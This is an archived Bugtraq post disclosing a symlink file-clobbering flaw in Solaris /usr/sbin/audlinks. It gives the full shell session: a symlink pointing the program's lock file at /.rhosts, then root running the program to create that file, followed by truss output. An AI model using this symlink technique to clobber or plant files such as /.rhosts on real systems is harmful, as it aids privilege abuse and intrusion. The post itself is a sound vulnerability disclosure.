Bugtraq mailing list archives
[no subject]
From: "Optyx - Uberhax0r Communications"@SECURITYFOCUS.COM
Date: Thu, 28 Dec 2000 14:34:50 -0800
/usr/sbin/audlinks has the following behavior: $ id uid=100(optyx) gid=1(other) $ mkdir -p /tmp/b/dev $ ln -s /.rhosts /tmp/b/dev/.devfsadm_dev.lock $ su root Password: # /usr/sbin/audlinks -r /tmp/b # ls -l /.rhosts -rw-r--r-- 1 root other 4 Dec 28 14:28 /.rhosts truss output snippet: open("/dev/.devfsadm_dev.lock", O_RDWR|O_CREAT, 0644) = 4 this is similar to the /usr/sbin/patchadd file clobbering "vulnerability" (not really a vulnerability as a user has to set the link then root has to run the program, but) -Optyx, Uberhax0r Communications http://www.uberhax0r.net
Current thread:
- [no subject] Optyx - Uberhax0r Communications (Dec 29)